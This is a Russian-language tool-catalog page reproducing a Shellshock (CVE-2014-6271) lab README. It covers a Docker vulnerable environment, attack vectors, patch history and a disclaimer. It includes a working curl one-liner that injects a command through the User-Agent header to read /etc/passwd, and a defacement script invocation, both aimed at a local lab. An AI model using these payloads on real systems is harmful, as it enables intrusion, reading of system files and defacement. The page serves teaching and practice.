Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
exploit-CVE-2014-6271 — Эксплойт Shellshock + уязвимая среда | Kitploit
Инструменты/GitHubGitHub/opsxcq/exploit-cve-2014-6271
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubopsxcq/exploit-cve-2014-6271

exploit-CVE-2014-6271

Эксплойт Shellshock + уязвимая среда

Репозиторий
2306069 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Logo

Shellshock exploit + уязвимая среда

Docker Pulls

Shellshock, также известный как Bashdoor, — это семейство ошибок безопасности в широко используемой Unix-оболочке Bash, первая из которых была раскрыта 24 сентября 2014 года. Многие интернет-сервисы, такие как некоторые веб-серверы, используют Bash для обработки определённых запросов, что позволяет злоумышленнику заставить уязвимые версии Bash выполнять произвольные команды. Это может позволить злоумышленнику получить несанкционированный доступ к компьютерной системе.

Запуск уязвимой среды

Для запуска среды потребуется установленный Docker. Перейдите на docker.com и установите его, если у вас его ещё нет.

Чтобы запустить уязвимую среду, просто выполните:

root@kitploit:~
docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271

Откройте браузер и перейдите по адресу localhost:8080. Если всё в порядке, вы увидите страницу, похожую на эту:

vulnerable

Эксплойт

Существует несколько способов эксплуатации этой уязвимости.

Эксплойт одной строкой

Простой пример для cat /etc/passwd:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Вы можете использовать это для выполнения любой нужной команды.

Эксплойт для дефейса

Это всего лишь пример кода в exploit-deface.sh. Запустите его против образа:

root@kitploit:~
./exploit-deface.sh <ip> <port>

Например, если вы запускаете его с помощью команды, указанной выше:

root@kitploit:~
./exploit-deface.sh localhost 8080

Просто обновите браузер, и вы увидите:

Deface

Проверка вашей системы

Просто запустите этот bash-скрипт в вашей системе, и вы узнаете, уязвимы вы или нет:

root@kitploit:~
env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

Векторы эксплуатации

CGI-веб-сервер

Когда веб-сервер использует Common Gateway Interface (CGI) для обработки запроса документа, он передаёт различные детали запроса программе-обработчику в списке переменных окружения. Например, переменная HTTP_USER_AGENT имеет значение, которое в обычном использовании идентифицирует программу, отправляющую запрос. Если обработчик запроса — это Bash-скрипт или если он запускает таковой (например, с помощью вызова system(3)), Bash получит переменные окружения, переданные сервером, и обработает их, как описано выше. Это предоставляет злоумышленнику способ вызвать уязвимость Shellshock с помощью специально сформированного запроса к серверу. Документация по безопасности широко используемого веб-сервера Apache гласит: «CGI-скрипты могут быть... чрезвычайно опасными, если их тщательно не проверить», и часто используются другие методы обработки запросов веб-сервера. Существует ряд онлайн-сервисов, которые пытаются проверить уязвимость веб-серверов, доступных через Интернет.

Сервер OpenSSH

OpenSSH имеет функцию «ForceCommand», при которой при входе пользователя выполняется фиксированная команда, а не просто запускается неограниченная командная оболочка. Фиксированная команда выполняется, даже если пользователь указал, что должна быть запущена другая команда; в этом случае исходная команда помещается в переменную окружения «SSH_ORIGINAL_COMMAND». Когда принудительная команда выполняется в оболочке Bash (если оболочка пользователя установлена на Bash), Bash при запуске анализирует переменную окружения SSH_ORIGINAL_COMMAND и выполняет встроенные в неё команды. Пользователь использует свой ограниченный доступ к оболочке, чтобы получить неограниченный доступ к оболочке, используя ошибку Shellshock.

DHCP-клиенты

Некоторые DHCP-клиенты также могут передавать команды Bash; уязвимая система может быть атакована при подключении к открытой Wi-Fi-сети. DHCP-клиент обычно запрашивает и получает IP-адрес от DHCP-сервера, но также может получать ряд дополнительных опций. Вредоносный DHCP-сервер может предоставить в одной из этих опций строку, созданную для выполнения кода на уязвимой рабочей станции или ноутбуке.

Сервер Qmail

При использовании Bash для обработки сообщений электронной почты (например, через .forward или каналы qmail-alias) почтовый сервер qmail передаёт внешние входные данные таким образом, что можно использовать уязвимую версию Bash.

Ограниченная оболочка IBM HMC

Ошибка может быть использована для получения доступа к Bash из ограниченной оболочки консоли управления оборудованием IBM (Hardware Management Console), крошечного варианта Linux для системных администраторов. IBM выпустила патч для устранения этой проблемы.

Исправление

До 24 сентября 2014 года мейнтейнер Bash Чет Рэми (Chet Ramey) предоставил патч-версию bash43-025 для Bash 4.3, исправляющую CVE-2014-6271, которая уже была упакована мейнтейнерами дистрибутивов. 24 сентября последовала версия bash43-026, исправляющая CVE-2014-7169. Затем была обнаружена CVE-2014-7186. Флориан Веймер (Florian Weimer) из Red Hat опубликовал некоторый код патча для этого «неофициально» 25 сентября, который Рэми включил в Bash как bash43-027. Эти патчи предоставляли только код, полезный только для тех, кто знает, как скомпилировать («пересобрать») новый исполняемый файл бинарного Bash из файла патча и остальных файлов исходного кода.

На следующий день Red Hat официально представил соответствующие обновления для Red Hat Enterprise Linux, а ещё через день — для Fedora 21. Canonical Ltd. представила обновления для своих версий Ubuntu Long Term Support в субботу, 27 сентября; в воскресенье появились обновления для SUSE Linux Enterprise. В следующий понедельник и вторник, в конце месяца, появились обновления для Apple OS X.

1 октября 2014 года Михал Залевски (Michał Zalewski) из Google Inc. наконец заявил, что код Веймера и bash43-027 исправили не только первые три ошибки, но и оставшиеся три, которые были опубликованы после bash43-027, включая два его собственных открытия. Это означает, что после более ранних обновлений дистрибутивов никакие другие обновления не требовались для устранения всех шести проблем.

Отказ от ответственности

Эта или предыдущая программа предназначена ТОЛЬКО для образовательных целей. Не используйте её без разрешения. Применяется обычный отказ от ответственности, особенно тот факт, что я (opsxcq) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленных этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за контент или неправильное использование этих программ или любых их производных. Используя эти программы, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), вызванный использованием этих программ, не является ответственностью opsxcq.

Скачать инструмент